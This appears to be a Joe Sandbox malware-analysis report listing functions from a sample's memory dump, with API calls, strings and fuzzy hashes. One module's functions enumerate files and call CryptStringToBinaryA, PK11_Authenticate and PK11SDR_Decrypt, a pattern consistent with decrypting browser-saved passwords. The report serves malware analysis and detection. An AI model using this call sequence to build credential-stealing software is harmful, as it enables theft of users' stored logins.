API String ID: 2518200370-449611708
Opcode ID: 3606a0017a0f74df69d483c51960287a0fc62730564afbf1ac70254abc098ed9
Instruction ID: e9c198df47b7b23266db8e690d528e6dbea2d13cefc12a62dc59eae19850fbd0
Opcode Fuzzy Hash: 3606a0017a0f74df69d483c51960287a0fc62730564afbf1ac70254abc098ed9
Instruction Fuzzy Hash: 4302F471B043018BE7049F799C8572B76B1BBC571CF2A863DD85A87B00EB74F8468796

Function 6C61A4D0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 501stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(6C5F28AD,pkcs11:,00000007), ref: 6C61A501
PORT_Strdup_Util.NSS3(6C5F28AD), ref: 6C61A514

Part of subcall function 6C650F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C5F2AF5,?,?,?,?,?,6C5F0A1B,00000000), ref: 6C650F1A
Part of subcall function 6C650F10: malloc.MOZGLUE(00000001), ref: 6C650F30
Part of subcall function 6C650F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C650F42

strchr.VCRUNTIME140(00000000,0000003A), ref: 6C61A529
PK11_GetInternalKeySlot.NSS3 ref: 6C61A60D
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C61A74B
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C61A777
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C61A80C
memcmp.VCRUNTIME140(?,00000001,00000000), ref: 6C61A82B
CERT_DestroyCertificate.NSS3(00000000), ref: 6C61A952
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C61A9C3

Part of subcall function 6C640960: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,6C61A8F5,00000000,?,00000010), ref: 6C64097E
Part of subcall function 6C640960: memcmp.VCRUNTIME140(?,00000000,6C61A8F5,00000010), ref: 6C64098D

free.MOZGLUE(00000000), ref: 6C61AB18
strchr.VCRUNTIME140(?,00000040), ref: 6C61AB40
free.MOZGLUE(?), ref: 6C61ABE1

Part of subcall function 6C614170: TlsGetValue.KERNEL32(?,6C5F28AD,00000000,?,6C61A793,?,00000000), ref: 6C61419F
Part of subcall function 6C614170: EnterCriticalSection.KERNEL32(0000001C), ref: 6C6141AF
Part of subcall function 6C614170: PR_Unlock.NSS3(?), ref: 6C6141D4

Strings

token, xrefs: 6C61A875
manufacturer, xrefs: 6C61A8A2
model, xrefs: 6C61A8CF
pkcs11:, xrefs: 6C61A4FB
object, xrefs: 6C61A5CF

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: strlen$Errorfreememcmpstrchr$CertificateCriticalDestroyEnterInternalK11_L_strncasecmpSectionSlotStrdup_UnlockUtilValuemallocmemcpy
String ID: manufacturer$model$object$pkcs11:$token
API String ID: 916065474-709816111
Opcode ID: ff808cc95a9f1fe49a1a6b8fb0cc5af258c58e1b0a71cf923ad999e8d8041926
Instruction ID: 7802c7458d8e641bf33f082a974c96b5c1645f7d29e3885cc3a182d885a50681
Opcode Fuzzy Hash: ff808cc95a9f1fe49a1a6b8fb0cc5af258c58e1b0a71cf923ad999e8d8041926
Instruction Fuzzy Hash: 4D0285B5E042149BEF119B389D41BAA7675AF1231DF1440A4D80CA2B13FB319E5DCF9A

Function 00EF31E0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EF31F0
HeapAlloc.KERNEL32(00000000), ref: 00EF31F7
wsprintfA.USER32 ref: 00EF3213
FindFirstFileA.KERNEL32(?,?), ref: 00EF322A
StrCmpCA.SHLWAPI(?,00EFE8AC), ref: 00EF3258
StrCmpCA.SHLWAPI(?,00EFE8B0), ref: 00EF326E
FindNextFileA.KERNEL32(000000FF,?), ref: 00EF32EF
FindClose.KERNEL32(000000FF), ref: 00EF3304
lstrcat.KERNEL32(?,0132D748), ref: 00EF3329
lstrcat.KERNEL32(?,01330E48), ref: 00EF333C
lstrlen.KERNEL32(?), ref: 00EF3349
lstrlen.KERNEL32(?), ref: 00EF335A

Strings

%s\*, xrefs: 00EF3207
%s\%s, xrefs: 00EF3285

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 6cad192f45bde486a002d0c5384ce7862576b449445ec5eeca98c7404b4bd162
Instruction ID: 35a53d47fa4753c61e9ed55348d3085697e39308db691a1a1a0562dcb870d7b5
Opcode Fuzzy Hash: 6cad192f45bde486a002d0c5384ce7862576b449445ec5eeca98c7404b4bd162
Instruction Fuzzy Hash: 4C51677194021CABCB29EBB0DC89EED737DAB58740F005598F61AA6184DFB49BC4CF51

Function 6C5EEF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5EEF63

Part of subcall function 6C5F87D0: PORT_NewArena_Util.NSS3(00000800,6C5EEF74,00000000), ref: 6C5F87E8
Part of subcall function 6C5F87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C5EEF74,00000000), ref: 6C5F87FD
Part of subcall function 6C5F87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C5F884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C5EF2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5EF2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C5EF30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C5EF374
PL_strcasecmp.NSS3(6C732FD4,?), ref: 6C5EF457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C5EF4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C5EF66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C5EF67D
CERT_DestroyName.NSS3(?), ref: 6C5EF68B

Part of subcall function 6C5F8320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C5F8338
Part of subcall function 6C5F8320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C5F8364
Part of subcall function 6C5F8320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C5F838E
Part of subcall function 6C5F8320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5F83A5
Part of subcall function 6C5F8320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5F83E3

Part of subcall function 6C5F84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C5F84D9
Part of subcall function 6C5F84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C5F8528

Part of subcall function 6C5F8900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C5EF599,?,00000000), ref: 6C5F8955

Strings

*, xrefs: 6C5EF3C6
oid., xrefs: 6C5EF2CF
", xrefs: 6C5EF21B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 740a4ecbe7f1ec6727aa037d98658f40924b19fd2e42018500f9a6bae861f634
Instruction ID: 9aa64d05671a238515eb3e55d7a1c09318f29751789f23e6b85988bd8a7e618c
Opcode Fuzzy Hash: 740a4ecbe7f1ec6727aa037d98658f40924b19fd2e42018500f9a6bae861f634
Instruction Fuzzy Hash: 2C2219726083518BD714CE29EC9076AB7E6ABCD318F184B6EE4D587B91EB319C05CB43

Function 6C65EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C65C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C65DAE2,?), ref: 6C65C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C65F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C65F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C65F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C65F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C72218C), ref: 6C65F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C65F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C65F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C65F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C65F210

Part of subcall function 6C6052D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C65F1E9,?,00000000,?,?), ref: 6C6052F5
Part of subcall function 6C6052D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C60530F
Part of subcall function 6C6052D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C605326
Part of subcall function 6C6052D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C65F1E9,?,00000000,?,?), ref: 6C605340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C65F227

Part of subcall function 6C64FAB0: free.MOZGLUE(?,-00000001,?,?,6C5EF673,00000000,00000000), ref: 6C64FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C65F23E

Part of subcall function 6C64BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C5FE708,00000000,00000000,00000004,00000000), ref: 6C64BE6A
Part of subcall function 6C64BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6004DC,?), ref: 6C64BE7E
Part of subcall function 6C64BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C64BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C65F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C65F3A8

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C65F3B3

Part of subcall function 6C602D20: PK11_DestroyObject.NSS3(?,?), ref: 6C602D3C
Part of subcall function 6C602D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C602D5F

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 5e7c29bf300f02af02776b4a038c5b102964a052b302f482550b7a2d2511682e
Instruction ID: 011e9c17109e3856810ebeddaef1f2949cddcb2782f1333a1e3a8cea6b20d99e
Opcode Fuzzy Hash: 5e7c29bf300f02af02776b4a038c5b102964a052b302f482550b7a2d2511682e
Instruction Fuzzy Hash: 00D1D4B6E016059FEB00CFA9D880A9EB7F5FF48308F648029D915E7711EB31E815CB99

Function 6C57ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C57ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C57EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C57EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C57EF98

Strings

database corruption, xrefs: 6C57F48D
%s at line %d of [%.10s], xrefs: 6C57F492
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C57F483

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 47e643a5b599b8db558bcfb6a5ba66e3dc67fc5224586e79abb04fff2e3077fd
Instruction ID: ca7efabf26903eae3ddbf7d826e79f7e7a167ee3700f8af773c714b7cca9862f
Opcode Fuzzy Hash: 47e643a5b599b8db558bcfb6a5ba66e3dc67fc5224586e79abb04fff2e3077fd
Instruction Fuzzy Hash: 2A62E170A04245CFDB24CF24CC84B9ABBB2BF45318F18469DD8565BB92D775E8C6CBA0

Function 00EEE450 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00EEE46E
FindFirstFileA.KERNEL32(?,?), ref: 00EEE485
StrCmpCA.SHLWAPI(?,00EFED88), ref: 00EEE4DB
StrCmpCA.SHLWAPI(?,00EFED8C), ref: 00EEE4F1
FindNextFileA.KERNEL32(000000FF,?), ref: 00EEE9D5
FindClose.KERNEL32(000000FF), ref: 00EEE9EA

Strings

i, xrefs: 00EEE9F0, 00EEE58B, 00EEE5A2, 00EEE49A, 00EEE5A5
%s\*.*, xrefs: 00EEE462

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*$i
API String ID: 180737720-167226156
Opcode ID: 9b6e4c9e39149d4c52cace9359945db3836db992d502ab5a4a3c3fb7cc4bf3bf
Instruction ID: 5b122085250b3eebd8d01763c1d01ddfb1239e682888003b6e90e7d3e7a07ed5
Opcode Fuzzy Hash: 9b6e4c9e39149d4c52cace9359945db3836db992d502ab5a4a3c3fb7cc4bf3bf
Instruction Fuzzy Hash: E4E1BD7291111C9ADF59FB60CD92AFE73B8AF54300F4051D9B60AB2492EF706B89CF51

Function 6C58AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C6ACF46,?,6C57CDBD,?,6C6ABF31,?,?,?,?,?,?,?), ref: 6C58B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C6ACF46,?,6C57CDBD,?,6C6ABF31), ref: 6C58B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C6ACF46,?,6C57CDBD,?,6C6ABF31), ref: 6C58B0A2
CloseHandle.KERNEL32(?,?,6C6ACF46,?,6C57CDBD,?,6C6ABF31,?,?,?,?,?,?,?,?,?), ref: 6C58B100
sqlite3_free.NSS3(?,?,00000002,?,6C6ACF46,?,6C57CDBD,?,6C6ABF31,?,?,?,?,?,?,?), ref: 6C58B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C6ACF46,?,6C57CDBD,?,6C6ABF31), ref: 6C58B12D

Part of subcall function 6C579EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C58C6FD,?,?,?,?,6C5DF965,00000000), ref: 6C579F0E
Part of subcall function 6C579EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C5DF965,00000000), ref: 6C579F5D

Strings

`pl, xrefs: 6C58B0DF

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `pl
API String ID: 3155957115-4028537341
Opcode ID: 539267a8c31f8baa00eb17da9139fce53c964e4fd322bf05de368e2e3c848cb7
Instruction ID: 1a85abeb2a92b4ea3371c16ba10ce1967b5ba24d4e610c056cad3b9b37b673ec
Opcode Fuzzy Hash: 539267a8c31f8baa00eb17da9139fce53c964e4fd322bf05de368e2e3c848cb7
Instruction Fuzzy Hash: AC91C0B4A05215CFEB14DF24CC84A6BB7B5FF45308F244A3DE41A97A90EB35E854CB61

Function 6C620EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C620F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C620FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C621006
PK11_FreeSymKey.NSS3(?), ref: 6C62101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C621033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C62103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C621048
memcpy.VCRUNTIME140(?,?,?), ref: 6C62108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6210BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C6210D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C62112E

Part of subcall function 6C621570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C6208C4,?,?), ref: 6C6215B8
Part of subcall function 6C621570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C6208C4,?,?), ref: 6C6215C1
Part of subcall function 6C621570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C62162E
Part of subcall function 6C621570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C621637

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: efa41b5768fd92dcefcf1ca7c167eef1478ad514bbfce33202683e902a8f2a34
Instruction ID: 68935e427b3725cc1cbf5321f8acc678a46a7e16ff0b22380c7e29ec8e2b72f9
Opcode Fuzzy Hash: efa41b5768fd92dcefcf1ca7c167eef1478ad514bbfce33202683e902a8f2a34
Instruction Fuzzy Hash: 8071E0B1E042058FDB04CFA5CC84AAAF7F4BF48318F148629E90997711EB76DD44CB89

Function 00EEBFC0 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00EEBFF3
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0132D4B8), ref: 00EEC011
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EEC01C
PK11_GetInternalKeySlot.NSS3 ref: 00EEC02A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 00EEC045
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00EEC08B
memcpy.MSVCRT ref: 00EEC0B2
lstrcat.KERNEL32(?,00EFE51F), ref: 00EEC0E3
lstrcat.KERNEL32(?,00EFE562), ref: 00EEC0F7
PK11_FreeSlot.NSS3(?), ref: 00EEC101
lstrcat.KERNEL32(?,00EFE563), ref: 00EEC118

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: af88c8790dec0aef9ac8f9f66279c4a8ea692d4b9144034c3fb2fc20d6f8bfa5
Instruction ID: 8ab0eaa9f5aead1ebecd6199524a54564dd4de527b673be14c191af5e054daee
Opcode Fuzzy Hash: af88c8790dec0aef9ac8f9f66279c4a8ea692d4b9144034c3fb2fc20d6f8bfa5
Instruction Fuzzy Hash: AF414D74D0421DDBCB24DF94DD89BFEB7B8AF48344F1081A8E609B6284DBB45A84CF91

Function 6C580FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C57CA30: EnterCriticalSection.KERNEL32(?,?,?,6C5DF9C9,?,6C5DF4DA,6C5DF9C9,?,?,6C5A369A), ref: 6C57CA7A
Part of subcall function 6C57CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C57CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C58103E
EnterCriticalSection.KERNEL32(?), ref: 6C581139
LeaveCriticalSection.KERNEL32(?), ref: 6C581190
sqlite3_free.NSS3(00000000), ref: 6C581227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C58126E
sqlite3_free.NSS3(?), ref: 6C58127F

Strings

winAccess, xrefs: 6C58129B
delayed %dms for lock/sharing conflict at line %d, xrefs: 6C581267
Ppl, xrefs: 6C58109E

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: Ppl$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1015119585
Opcode ID: f818e7a41fd0e3736e0f2dcfd944868131d0a8991f76123ad5bd46f306065c90
Instruction ID: 9c58d44955823efbab1e680498766f1f3448318d553db7271e49a75e5957a9ab
Opcode Fuzzy Hash: f818e7a41fd0e3736e0f2dcfd944868131d0a8991f76123ad5bd46f306065c90
